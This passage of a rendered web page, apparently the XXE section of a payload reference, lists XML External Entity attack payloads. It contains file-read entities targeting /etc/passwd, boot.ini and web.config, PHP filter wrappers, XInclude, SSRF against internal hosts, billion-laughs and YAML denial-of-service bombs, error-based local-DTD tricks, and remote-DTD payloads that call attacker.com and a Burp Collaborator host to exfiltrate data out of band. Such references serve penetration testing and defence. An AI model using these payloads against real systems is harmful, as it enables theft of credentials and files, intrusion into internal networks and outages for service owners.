<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="w"> </span><span class="nt">&lt;userInfo&gt;</span>
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a><span class="w"> </span><span class="nt">&lt;firstName&gt;</span>John<span class="nt">&lt;/firstName&gt;</span>
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a><span class="w"> </span><span class="nt">&lt;lastName&gt;</span><span class="ni">&amp;example;</span><span class="nt">&lt;/lastName&gt;</span>
<a id="__codelineno-0-6" name="__codelineno-0-6" href="#__codelineno-0-6"></a><span class="w"> </span><span class="nt">&lt;/userInfo&gt;</span>
</code></pre></div>
<p>It might help to set the <code>Content-Type: application/xml</code> in the request when sending XML payload to the server.</p>
<h2 id="exploiting-xxe-to-retrieve-files">Exploiting XXE to Retrieve Files</h2>
<h3 id="classic-xxe">Classic XXE</h3>
<p>We try to display the content of the file <code>/etc/passwd</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE root [&lt;!ENTITY test SYSTEM &#39;file:///etc/passwd&#39;&gt;</span>]&gt;<span class="nt">&lt;root&gt;</span><span class="ni">&amp;test;</span><span class="nt">&lt;/root&gt;</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot;?&gt;</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="cp">&lt;!DOCTYPE data [</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="cp">&lt;!ELEMENT data (#ANY)&gt;</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="cp">&lt;!ENTITY file SYSTEM &quot;file:///etc/passwd&quot;&gt;</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a>]&gt;
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="nt">&lt;data&gt;</span><span class="ni">&amp;file;</span><span class="nt">&lt;/data&gt;</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="w"> </span><span class="cp">&lt;!DOCTYPE foo [</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="cp"> &lt;!ELEMENT foo ANY &gt;</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="w"> </span><span class="cp">&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot; &gt;</span>]&gt;<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="cp">&lt;!DOCTYPE foo [</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="cp"> &lt;!ELEMENT foo ANY &gt;</span>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="w"> </span><span class="cp">&lt;!ENTITY xxe SYSTEM &quot;file:///c:/boot.ini&quot; &gt;</span>]&gt;<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> <code>SYSTEM</code> and <code>PUBLIC</code> are almost synonym.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="p">&lt;!</span><span class="n">ENTITY</span> <span class="p">%</span> <span class="n">xxe</span> <span class="n">PUBLIC</span> <span class="s2">&quot;Random Text&quot;</span> <span class="s2">&quot;URL&quot;</span><span class="p">&gt;</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="p">&lt;!</span><span class="n">ENTITY</span> <span class="n">xxe</span> <span class="n">PUBLIC</span> <span class="s2">&quot;Any TEXT&quot;</span> <span class="s2">&quot;URL&quot;</span><span class="p">&gt;</span>
</code></pre></div>
<h3 id="classic-xxe-base64-encoded">Classic XXE Base64 Encoded</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="cp">&lt;!DOCTYPE test [ &lt;!ENTITY % init SYSTEM &quot;data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk&quot;&gt;</span><span class="w"> </span>%init;<span class="w"> </span>]&gt;<span class="nt">&lt;foo/&gt;</span>
</code></pre></div>
<h3 id="php-wrapper-inside-xxe">PHP Wrapper Inside XXE</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="cp">&lt;!DOCTYPE replace [&lt;!ENTITY xxe SYSTEM &quot;php://filter/convert.base64-encode/resource=index.php&quot;&gt;</span><span class="w"> </span>]&gt;
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="nt">&lt;contacts&gt;</span>
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a><span class="w"> </span><span class="nt">&lt;contact&gt;</span>
<a id="__codelineno-7-4" name="__codelineno-7-4" href="#__codelineno-7-4"></a><span class="w"> </span><span class="nt">&lt;name&gt;</span>Jean<span class="w"> </span><span class="ni">&amp;xxe;</span><span class="w"> </span>Dupont<span class="nt">&lt;/name&gt;</span>
<a id="__codelineno-7-5" name="__codelineno-7-5" href="#__codelineno-7-5"></a><span class="w"> </span><span class="nt">&lt;phone&gt;</span>00<span class="w"> </span>11<span class="w"> </span>22<span class="w"> </span>33<span class="w"> </span>44<span class="nt">&lt;/phone&gt;</span>
<a id="__codelineno-7-6" name="__codelineno-7-6" href="#__codelineno-7-6"></a><span class="w"> </span><span class="nt">&lt;address&gt;</span>42<span class="w"> </span>rue<span class="w"> </span>du<span class="w"> </span>CTF<span class="nt">&lt;/address&gt;</span>
<a id="__codelineno-7-7" name="__codelineno-7-7" href="#__codelineno-7-7"></a><span class="w"> </span><span class="nt">&lt;zipcode&gt;</span>75000<span class="nt">&lt;/zipcode&gt;</span>
<a id="__codelineno-7-8" name="__codelineno-7-8" href="#__codelineno-7-8"></a><span class="w"> </span><span class="nt">&lt;city&gt;</span>Paris<span class="nt">&lt;/city&gt;</span>
<a id="__codelineno-7-9" name="__codelineno-7-9" href="#__codelineno-7-9"></a><span class="w"> </span><span class="nt">&lt;/contact&gt;</span>
<a id="__codelineno-7-10" name="__codelineno-7-10" href="#__codelineno-7-10"></a><span class="nt">&lt;/contacts&gt;</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="cp">&lt;!DOCTYPE foo [</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="cp">&lt;!ELEMENT foo ANY &gt;</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="cp">&lt;!ENTITY % xxe SYSTEM &quot;php://filter/convert.base64-encode/resource=http://10.0.0.3&quot; &gt;</span>
<a id="__codelineno-8-5" name="__codelineno-8-5" href="#__codelineno-8-5"></a>]&gt;
<a id="__codelineno-8-6" name="__codelineno-8-6" href="#__codelineno-8-6"></a><span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div>
<h3 id="xinclude-attacks">XInclude Attacks</h3>
<p>When you can't modify the <strong>DOCTYPE</strong> element use the <strong>XInclude</strong> to target</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="nt">&lt;foo</span><span class="w"> </span><span class="na">xmlns:xi=</span><span class="s">&quot;http://www.w3.org/2001/XInclude&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="nt">&lt;xi:include</span><span class="w"> </span><span class="na">parse=</span><span class="s">&quot;text&quot;</span><span class="w"> </span><span class="na">href=</span><span class="s">&quot;file:///etc/passwd&quot;</span><span class="nt">/&gt;&lt;/foo&gt;</span>
</code></pre></div>
<h2 id="exploiting-xxe-to-perform-ssrf-attacks">Exploiting XXE to Perform SSRF Attacks</h2>
<p>XXE can be combined with the <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery">SSRF vulnerability</a> to target another service on the network.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="cp">&lt;!DOCTYPE foo [</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="cp">&lt;!ELEMENT foo ANY &gt;</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="cp">&lt;!ENTITY % xxe SYSTEM &quot;http://internal.service/secret_pass.txt&quot; &gt;</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a>]&gt;
<a id="__codelineno-10-6" name="__codelineno-10-6" href="#__codelineno-10-6"></a><span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div>
<h2 id="exploiting-xxe-to-perform-a-denial-of-service">Exploiting XXE to Perform a Denial of Service</h2>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> : These attacks might kill the service or the server, do not use them on the production.</p>
<h3 id="billion-laugh-attack">Billion Laugh Attack</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="cp">&lt;!DOCTYPE data [</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="cp">&lt;!ENTITY a0 &quot;dos&quot; &gt;</span>
<a id="__codelineno-11-3" name="__codelineno-11-3" href="#__codelineno-11-3"></a><span class="cp">&lt;!ENTITY a1 &quot;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&quot;&gt;</span>
<a id="__codelineno-11-4" name="__codelineno-11-4" href="#__codelineno-11-4"></a><span class="cp">&lt;!ENTITY a2 &quot;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&quot;&gt;</span>
<a id="__codelineno-11-5" name="__codelineno-11-5" href="#__codelineno-11-5"></a><span class="cp">&lt;!ENTITY a3 &quot;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&quot;&gt;</span>
<a id="__codelineno-11-6" name="__codelineno-11-6" href="#__codelineno-11-6"></a><span class="cp">&lt;!ENTITY a4 &quot;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&quot;&gt;</span>
<a id="__codelineno-11-7" name="__codelineno-11-7" href="#__codelineno-11-7"></a>]&gt;
<a id="__codelineno-11-8" name="__codelineno-11-8" href="#__codelineno-11-8"></a><span class="nt">&lt;data&gt;</span><span class="ni">&amp;a4;</span><span class="nt">&lt;/data&gt;</span>
</code></pre></div>
<h3 id="yaml-attack">YAML Attack</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a>a:<span class="w"> </span><span class="err">&amp;</span>a<span class="w"> </span>[&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;,&quot;lol&quot;]
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a>b:<span class="w"> </span><span class="err">&amp;</span>b<span class="w"> </span>[*a,*a,*a,*a,*a,*a,*a,*a,*a]
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a>c:<span class="w"> </span><span class="err">&amp;</span>c<span class="w"> </span>[*b,*b,*b,*b,*b,*b,*b,*b,*b]
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a>d:<span class="w"> </span><span class="err">&amp;</span>d<span class="w"> </span>[*c,*c,*c,*c,*c,*c,*c,*c,*c]
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a>e:<span class="w"> </span><span class="err">&amp;</span>e<span class="w"> </span>[*d,*d,*d,*d,*d,*d,*d,*d,*d]
<a id="__codelineno-12-6" name="__codelineno-12-6" href="#__codelineno-12-6"></a>f:<span class="w"> </span><span class="err">&amp;</span>f<span class="w"> </span>[*e,*e,*e,*e,*e,*e,*e,*e,*e]
<a id="__codelineno-12-7" name="__codelineno-12-7" href="#__codelineno-12-7"></a>g:<span class="w"> </span><span class="err">&amp;</span>g<span class="w"> </span>[*f,*f,*f,*f,*f,*f,*f,*f,*f]
<a id="__codelineno-12-8" name="__codelineno-12-8" href="#__codelineno-12-8"></a>h:<span class="w"> </span><span class="err">&amp;</span>h<span class="w"> </span>[*g,*g,*g,*g,*g,*g,*g,*g,*g]
<a id="__codelineno-12-9" name="__codelineno-12-9" href="#__codelineno-12-9"></a>i:<span class="w"> </span><span class="err">&amp;</span>i<span class="w"> </span>[*h,*h,*h,*h,*h,*h,*h,*h,*h]
</code></pre></div>
<h3 id="parameters-laugh-attack">Parameters Laugh Attack</h3>
<p>A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="cp">&lt;!DOCTYPE r [</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="cp"> &lt;!ENTITY % pe_1 &quot;&lt;!----&gt;</span>&quot;&gt;
<a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a><span class="w"> </span><span class="cp">&lt;!ENTITY % pe_2 &quot;&amp;#37;pe_1;&lt;!----&gt;</span><span class="ni">&amp;#37;</span>pe_1;&quot;&gt;
<a id="__codelineno-13-4" name="__codelineno-13-4" href="#__codelineno-13-4"></a><span class="w"> </span><span class="cp">&lt;!ENTITY % pe_3 &quot;&amp;#37;pe_2;&lt;!----&gt;</span><span class="ni">&amp;#37;</span>pe_2;&quot;&gt;
<a id="__codelineno-13-5" name="__codelineno-13-5" href="#__codelineno-13-5"></a><span class="w"> </span><span class="cp">&lt;!ENTITY % pe_4 &quot;&amp;#37;pe_3;&lt;!----&gt;</span><span class="ni">&amp;#37;</span>pe_3;&quot;&gt;
<a id="__codelineno-13-6" name="__codelineno-13-6" href="#__codelineno-13-6"></a><span class="w"> </span>%pe_4;
<a id="__codelineno-13-7" name="__codelineno-13-7" href="#__codelineno-13-7"></a>]&gt;
<a id="__codelineno-13-8" name="__codelineno-13-8" href="#__codelineno-13-8"></a><span class="nt">&lt;r/&gt;</span>
</code></pre></div>
<h2 id="exploiting-error-based-xxe">Exploiting Error Based XXE</h2>
<h3 id="error-based-using-local-dtd-file">Error Based - Using Local DTD File</h3>
<p>If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="cp">&lt;!DOCTYPE root [</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="cp"> &lt;!ENTITY % local_dtd SYSTEM &quot;file:///abcxyz/&quot;&gt;</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="w"> </span>%local_dtd;
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a>]&gt;
<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a><span class="nt">&lt;root&gt;&lt;/root&gt;</span>
</code></pre></div>
<ul>
<li><a href="https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md">GoSecure/dtd-finder</a> - List DTDs and generate XXE payloads using those local DTDs.</li>
</ul>
<h4 id="linux-local-dtd">Linux Local DTD</h4>
<p>Short list of DTD files already stored on Linux systems; list them with <code>locate .dtd</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a>/usr/share/xml/fontconfig/fonts.dtd
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a>/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a>/usr/share/xml/svg/svg10.dtd
<a id="__codelineno-15-4" name="__codelineno-15-4" href="#__codelineno-15-4"></a>/usr/share/xml/svg/svg11.dtd
<a id="__codelineno-15-5" name="__codelineno-15-5" href="#__codelineno-15-5"></a>/usr/share/yelp/dtd/docbookx.dtd
</code></pre></div>
<p>The file <code>/usr/share/xml/fontconfig/fonts.dtd</code> has an injectable entity <code>%constant</code> at line 148: <code>&lt;!ENTITY % constant 'int|double|string|matrix|bool|charset|langset|const'&gt;</code></p>
<p>The final payload becomes:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="cp">&lt;!DOCTYPE message [</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="cp"> &lt;!ENTITY % local_dtd SYSTEM &quot;file:///usr/share/xml/fontconfig/fonts.dtd&quot;&gt;</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="w"> </span><span class="cp">&lt;!ENTITY % constant &#39;aaa)&gt;</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a><span class="w"> </span><span class="cp">&lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:///etc/passwd&quot;&gt;</span>
<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="w"> </span><span class="cp">&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///patt/&amp;#x25;file;&amp;#x27;&gt;</span>&quot;&gt;
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a><span class="w"> </span><span class="ni">&amp;#x25;</span>eval;
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="w"> </span><span class="ni">&amp;#x25;</span>error;
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a><span class="w"> </span><span class="cp">&lt;!ELEMENT aa (bb&#39;&gt;</span>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="w"> </span>%local_dtd;
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a>]&gt;
<a id="__codelineno-16-11" name="__codelineno-16-11" href="#__codelineno-16-11"></a><span class="nt">&lt;message&gt;</span>Text<span class="nt">&lt;/message&gt;</span>
</code></pre></div>
<h4 id="windows-local-dtd">Windows Local DTD</h4>
<p>Payloads from <a href="https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79">infosec-au/xxe-windows.md</a>.</p>
<ul>
<li>Disclose local file</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="cp">&lt;!DOCTYPE doc [</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="cp"> &lt;!ENTITY % local_dtd SYSTEM &quot;file:///C:\Windows\System32\wbem\xml\cim20.dtd&quot;&gt;</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="w"> </span><span class="cp">&lt;!ENTITY % SuperClass &#39;&gt;</span>
<a id="__codelineno-17-4" name="__codelineno-17-4" href="#__codelineno-17-4"></a><span class="w"> </span><span class="cp">&lt;!ENTITY &amp;#x25; file SYSTEM &quot;file://D:\webserv2\services\web.config&quot;&gt;</span>
<a id="__codelineno-17-5" name="__codelineno-17-5" href="#__codelineno-17-5"></a><span class="w"> </span><span class="cp">&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file://t/#&amp;#x25;file;&amp;#x27;&gt;</span>&quot;&gt;
<a id="__codelineno-17-6" name="__codelineno-17-6" href="#__codelineno-17-6"></a><span class="w"> </span><span class="ni">&amp;#x25;</span>eval;
<a id="__codelineno-17-7" name="__codelineno-17-7" href="#__codelineno-17-7"></a><span class="w"> </span><span class="ni">&amp;#x25;</span>error;
<a id="__codelineno-17-8" name="__codelineno-17-8" href="#__codelineno-17-8"></a><span class="w"> </span><span class="cp">&lt;!ENTITY test &quot;test&quot;&#39;</span>
<a id="__codelineno-17-9" name="__codelineno-17-9" href="#__codelineno-17-9"></a><span class="cp"> &gt;</span>
<a id="__codelineno-17-10" name="__codelineno-17-10" href="#__codelineno-17-10"></a><span class="w"> </span>%local_dtd;
<a id="__codelineno-17-11" name="__codelineno-17-11" href="#__codelineno-17-11"></a><span class="w"> </span>]&gt;<span class="nt">&lt;xxx&gt;</span>anything<span class="nt">&lt;/xxx&gt;</span>
</code></pre></div>
<ul>
<li>Disclose HTTP Response</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="cp">&lt;!DOCTYPE doc [</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="cp"> &lt;!ENTITY % local_dtd SYSTEM &quot;file:///C:\Windows\System32\wbem\xml\cim20.dtd&quot;&gt;</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="w"> </span><span class="cp">&lt;!ENTITY % SuperClass &#39;&gt;</span>
<a id="__codelineno-18-4" name="__codelineno-18-4" href="#__codelineno-18-4"></a><span class="w"> </span><span class="cp">&lt;!ENTITY &amp;#x25; file SYSTEM &quot;https://erp.company.com&quot;&gt;</span>
<a id="__codelineno-18-5" name="__codelineno-18-5" href="#__codelineno-18-5"></a><span class="w"> </span><span class="cp">&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file://test/#&amp;#x25;file;&amp;#x27;&gt;</span>&quot;&gt;
<a id="__codelineno-18-6" name="__codelineno-18-6" href="#__codelineno-18-6"></a><span class="w"> </span><span class="ni">&amp;#x25;</span>eval;
<a id="__codelineno-18-7" name="__codelineno-18-7" href="#__codelineno-18-7"></a><span class="w"> </span><span class="ni">&amp;#x25;</span>error;
<a id="__codelineno-18-8" name="__codelineno-18-8" href="#__codelineno-18-8"></a><span class="w"> </span><span class="cp">&lt;!ENTITY test &quot;test&quot;&#39;</span>
<a id="__codelineno-18-9" name="__codelineno-18-9" href="#__codelineno-18-9"></a><span class="cp"> &gt;</span>
<a id="__codelineno-18-10" name="__codelineno-18-10" href="#__codelineno-18-10"></a><span class="w"> </span>%local_dtd;
<a id="__codelineno-18-11" name="__codelineno-18-11" href="#__codelineno-18-11"></a><span class="w"> </span>]&gt;<span class="nt">&lt;xxx&gt;</span>anything<span class="nt">&lt;/xxx&gt;</span>
</code></pre></div>
<h3 id="error-based-using-remote-dtd">Error Based - Using Remote DTD</h3>
<p><strong>Payload to trigger the XXE</strong></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; ?&gt;</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="cp">&lt;!DOCTYPE message [</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="cp"> &lt;!ENTITY % ext SYSTEM &quot;http://attacker.com/ext.dtd&quot;&gt;</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="w"> </span>%ext;
<a id="__codelineno-19-5" name="__codelineno-19-5" href="#__codelineno-19-5"></a>]&gt;
<a id="__codelineno-19-6" name="__codelineno-19-6" href="#__codelineno-19-6"></a><span class="nt">&lt;message&gt;&lt;/message&gt;</span>
</code></pre></div>
<p><strong>Content of ext.dtd</strong></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="cp">&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="cp">&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; error SYSTEM &#39;file:///nonexistent/%file;&#39;&gt;</span>&quot;&gt;
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a>%eval;
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a>%error;
</code></pre></div>
<p><strong>Alternative content of ext.dtd</strong></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="cp">&lt;!ENTITY % data SYSTEM &quot;file:///etc/passwd&quot;&gt;</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="cp">&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; leak SYSTEM &#39;%data;:///&#39;&gt;</span>&quot;&gt;
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a>%eval;
<a id="__codelineno-21-4" name="__codelineno-21-4" href="#__codelineno-21-4"></a>%leak;
</code></pre></div>
<p>Let's break down the payload:</p>
<ol>
<li><code>&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</code>
This line defines an external entity named file that references the content of the file /etc/passwd (a Unix-like system file containing user account details).</li>
<li><code>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; error SYSTEM 'file:///nonexistent/%file;'&gt;"&gt;</code>
This line defines an entity eval that holds another entity definition. This other entity (error) is meant to reference a nonexistent file and append the content of the file entity (the <code>/etc/passwd</code> content) to the end of the file path. The <code>&amp;#x25;</code> is a URL-encoded '<code>%</code>' used to reference an entity inside an entity definition.</li>
<li><code>%eval;</code>
This line uses the eval entity, which causes the entity error to be defined.</li>
<li><code>%error;</code>
Finally, this line uses the error entity, which attempts to access a nonexistent file with a path that includes the content of <code>/etc/passwd</code>. Since the file doesn't exist, an error will be thrown. If the application reports back the error to the user and includes the file path in the error message, then the content of <code>/etc/passwd</code> would be disclosed as part of the error message, revealing sensitive information.</li>
</ol>
<h2 id="exploiting-blind-xxe-to-exfiltrate-data-out-of-band">Exploiting Blind XXE to Exfiltrate Data Out of Band</h2>
<p>Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.</p>
<h3 id="basic-blind-xxe">Basic Blind XXE</h3>
<p>The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; ?&gt;</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="cp">&lt;!DOCTYPE root [</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="cp">&lt;!ENTITY % ext SYSTEM &quot;http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x&quot;&gt;</span><span class="w"> </span>%ext;
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a>]&gt;
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="nt">&lt;r&gt;&lt;/r&gt;</span>
</code></pre></div>
